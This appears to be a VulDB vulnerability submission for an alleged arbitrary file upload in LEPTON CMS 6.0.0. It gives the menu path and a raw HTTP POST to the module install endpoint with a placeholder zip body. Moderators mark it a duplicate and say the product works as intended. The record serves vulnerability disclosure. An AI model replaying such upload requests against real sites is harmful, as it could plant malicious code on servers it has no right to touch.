| Title | https://lepton-cms.org/ leptoncms 6.0.0 Arbitrary File Upload |
|---|
| Description | Menu -> Add-ons -> Modules -> Install (upload a PHP file containing malicious code)
POST /LEPTON6.0.0/upload/backend/modules/install.php?leptoken=8ca7e18fb30dc95ac7874z1753067977 HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 605
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="127", "Not)A;Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryh6XBRla9BlNIaIyi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: lep4399sessionid=60na1cdmru74b80iui1p4oar3c; cookieconsent_status=dismiss
Connection: keep-alive
------WebKitFormBoundaryh6XBRla9BlNIaIyi
Content-Disposition: form-data; name="userfile"; filename="ctfshow.zip"
Content-Type: application/x-zip-compressed
xxxxxxxxxxx
------WebKitFormBoundaryh6XBRla9BlNIaIyi
Content-Disposition: form-data; name="submit"
Install
------WebKitFormBoundaryh6XBRla9BlNIaIyi-- |
|---|
| Source | http://127.0.0.1/LEPTON6.0.0/upload/backend/modules/install.php?leptoken=8ca7e18fb30dc95ac7874z1753067977 |
|---|
| User | liule960117 (UID 88729) |
|---|
| Submission | 05/08/2025 11:45 (9 months ago) |
|---|
| Moderation | 09/08/2025 11:57 (4 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB Entry | 259032 [Lepton 7.1.0 PHP File Privilege Escalation] |
|---|
| Explanation | product works as intended |
|---|
| Points | 0 |
|---|